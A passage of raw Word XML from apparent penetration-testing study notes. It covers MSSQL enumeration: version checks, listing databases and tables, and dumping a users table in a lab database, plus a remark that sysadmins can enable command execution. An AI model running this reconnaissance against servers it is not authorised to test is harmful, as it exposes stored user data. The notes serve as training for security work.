          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are sysadmin, then you have permissions to do anything, including allowing command execution!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: When using an SQL Server command line tool like sqlcmd, we must submit our SQL statement ending with a semicolon followed by GO on a separate line. However, when running the command remotely, we can omit the GO statement since it's not part of the MSSQL TDS protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Commands for Orientation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start by gathering information about the SQL Server and its environment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check SQL Server Version AND underlying operating system version</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT @@version;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4062413" cy="1204401"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="86" name="image88.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image88.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId516"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4062413" cy="1204401"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001900">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our query returned valuable information about the running version of the MSSQL server along with the Windows Server version, including its build number.</w:t>
      </w:r>
    </w:p>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List Databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001904">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT name FROM sys.databases;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001905">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default databases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001906">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">master</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tempdb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">model</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msdb </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are default databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001907">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So if you see something besides these, then take a look!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT name FROM master..sysdatabases;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001909">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1402"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Older version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List Tables in the a database (you don't currently need to be inside of a database):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.information_schema.tables;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the database name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No matter the database name, you have to include </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.information_schema.tables;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000190F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3548063" cy="559342"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212" name="image198.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image198.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId517"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3548063" cy="559342"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001910">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our query returned the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table as the only one available in the database, so let's inspect it by selecting all of its records. We'll need to specify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dbo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table schema between the database and the table names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001911">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001912">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect table:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001913">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select * from offsec.dbo.users;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001914">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001915">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dbo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the table schema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001916">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We need to specify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dbo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table schema between the database and the table names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001917">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the table name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="560"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2101258" cy="1171705"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="431" name="image416.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image416.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId518"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2101258" cy="1171705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001919">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to a Database (idk if it works, but the below commands with SELECT don't even need you to go into a specific database, since the SELECT commands will specify the database in the command)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE [database_name];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000191D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List Tables in the Current Database (you need to use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE </w:t>
      </w:r>
